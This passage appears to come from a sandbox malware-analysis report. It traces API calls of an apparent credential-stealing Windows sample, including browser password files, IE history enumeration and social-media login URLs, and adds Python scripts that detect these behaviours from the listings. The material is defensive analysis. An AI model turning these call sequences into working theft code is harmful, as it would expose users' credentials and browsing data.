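• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT ref: 0040B60D
"""

if __name__ == "__main__":
    for rec in analyze(SAMPLE_REPORT):
        print(rec["entry"], rec["tags"], rec["resolved"])
```

The argument columns in these listings are stack-slot snapshots, so only the leading arguments are reliable; the rules above therefore key on the first argument of each call and on API co-occurrence rather than on full signatures.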

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                              • API String ID: 2744995895-28296030
                                                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                              • memcpy.MSVCRT ref: 0040BB66
                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                              • String ID: chp$v10
                                                                                              • API String ID: 170802307-2783969131
                                                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                               Control-flow graph (rendered graph not preserved in this extraction): entry block 4091b8-40921b; library calls in the graph: memset, memcpy, memcmp.
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                              • String ID:
                                                                                              • API String ID: 3715365532-3916222277
                                                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                              • String ID: bhv
                                                                                              • API String ID: 327780389-2689659898
                                                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                               Control-flow graph (rendered graph not preserved in this extraction): entry block 413f4f-413f52; calls sub-function 40a804 and then GetProcAddress five times.
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2941347001-70141382
                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                               Control-flow graph (rendered graph not preserved in this extraction): entry block 4466f4-44670e; MSVC run-time start-up sequence (GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __wgetmainargs, GetStartupInfoW), then a call to 41276d followed by exit/_cexit; in a standard CRT start-up stub that call is the hand-off to the program's own entry routine.
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 2827331108-0
                                                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                              • String ID: visited:
                                                                                              • API String ID: 1157525455-1702587658
                                                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

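The API listings above are more useful parsed than read, because the evidence is the order of calls, not any single API. As an added worked example (not part of the Joe Sandbox report and not code from the sample), the script below parses lines in the report's own "Name.MODULE(args), ref: address" shape and evaluates three behavioural checks drawn from the functions above: OpenProcess with PROCESS_DUP_HANDLE followed by DuplicateHandle, CreateFileMappingW, MapViewOfFile and WriteFile (reading a file that another process holds open, the sequence at 0040E093-0040E12E); FindFirstUrlCacheEntryW with the "visited:" prefix (WinINet history enumeration at 0040C30D); and GetProcAddress of psapi.dll exports (process enumeration resolved at run time at 00413F6F-00413F9F). The sample listing inside the script is constructed from those entries; the function names, the PROCESS_DUP_HANDLE constant (0x0040) and the heuristics are mine, not the report's. One caveat when reading these listings: FindCloseChangeNotification and CloseHandle resolve to the same routine in KERNELBASE, so a listing that shows FindCloseChangeNotification right after a file handle stops being used is almost certainly a plain CloseHandle.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the shape of the report's "APIs" listings (bullet, optional
# "Part of subcall function" prefix, Name.MODULE(args), ref: address); entries mirror
# the handle-duplication, URL-cache and psapi functions shown on this page.
SAMPLE_APIS = """
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
"""

# Optional subcall prefix, API name (may contain ? and @ for C++ mangled names),
# module, optional argument list, then the reference address.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

PROCESS_DUP_HANDLE = 0x0040  # OpenProcess access right DuplicateHandle needs on the source


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # callee address when the line was lifted from a subcall


def parse_api_listing(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_LINE.match(line)
        if not m:
            continue  # section headers, legend lines, blank lines
        args = m.group("args")
        # The report does not quote string arguments, so a comma inside a string
        # would be split as well; no entry on this page contains one.
        calls.append(ApiCall(name=m.group("name"), module=m.group("module"),
                             args=[a.strip() for a in args.split(",")] if args else [],
                             ref=m.group("ref"), subcall_of=m.group("sub")))
    return calls


def hex_arg(call: ApiCall, index: int) -> Optional[int]:
    """Argument as an integer, or None when the report shows '?' (value not recovered)."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def _next(calls: List[ApiCall], name: str, start: int = 0) -> int:
    for i in range(start, len(calls)):
        if calls[i].name == name:
            return i
    return -1


def detect_duplicated_handle_file_copy(calls: List[ApiCall]) -> bool:
    """OpenProcess(PROCESS_DUP_HANDLE), then DuplicateHandle, CreateFileMappingW,
    MapViewOfFile and WriteFile in listing order within the function itself (subcall
    lines excluded): reading a file another process keeps open with exclusive sharing."""
    own = [c for c in calls if c.subcall_of is None]
    i = _next(own, "OpenProcess")
    access = hex_arg(own[i], 0) if i >= 0 else None
    if access is None or not (access & PROCESS_DUP_HANDLE):
        return False
    for name in ("DuplicateHandle", "CreateFileMappingW", "MapViewOfFile", "WriteFile"):
        i = _next(own, name, i + 1)
        if i < 0:
            return False
    return True


def detect_ie_history_enumeration(calls: List[ApiCall]) -> bool:
    """FindFirstUrlCacheEntryW with the 'visited:' prefix walks the WinINet history index."""
    return any(c.name == "FindFirstUrlCacheEntryW" and c.args[:1] == ["visited:"] for c in calls)


PSAPI_EXPORTS = {"EnumProcesses", "EnumProcessModules", "GetModuleFileNameExW",
                 "GetModuleBaseNameW", "GetModuleInformation"}


def resolved_psapi_exports(calls: List[ApiCall]) -> List[str]:
    """psapi.dll exports looked up with GetProcAddress instead of being imported."""
    return sorted(c.args[1] for c in calls
                  if c.name == "GetProcAddress" and len(c.args) > 1 and c.args[1] in PSAPI_EXPORTS)


def analyse(text: str) -> Dict[str, object]:
    calls = parse_api_listing(text)
    return {"calls": len(calls),
            "duplicated_handle_file_copy": detect_duplicated_handle_file_copy(calls),
            "ie_history_enumeration": detect_ie_history_enumeration(calls),
            "psapi_exports_resolved_at_runtime": resolved_psapi_exports(calls)}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_APIS).items():
        print(f"{key}: {value}")
```

The handle-duplication check deliberately requires the OpenProcess access mask to contain 0x0040 and ignores "?" arguments, so a listing in which the analysis could not recover the access mask does not fire; loosen that only if you are willing to accept more false positives.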
                                                                                              Control-flow Graph

                                                                                               Control-flow graph (rendered graph not preserved in this extraction): entry block 40e175-40e1a1; library calls in the graph: memset, _snwprintf, ??3@YAXPAX@Z.
                                                                                              APIs
                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                              • API String ID: 3883404497-2982631422
                                                                                              • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                              • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT ref: 0040BCD6
• memcpy.MSVCRT ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 509814883-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Function at 41837f (graph layout not reproduced): calls 418197, 418160, 41739b, CreateFileW, CreateFileA, GetLastError, ??3@YAXPAX@Z, 444706, 41837f (itself), memset, 418758
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• ??3@YAXPAX@Z.MSVCRT ref: 0041848B
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: CreateFile$??3@ErrorLast
• String ID: |A
• API String ID: 1407640353-1717621600
• Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction Fuzzy Hash: 0331A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 62308376-4196376884
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
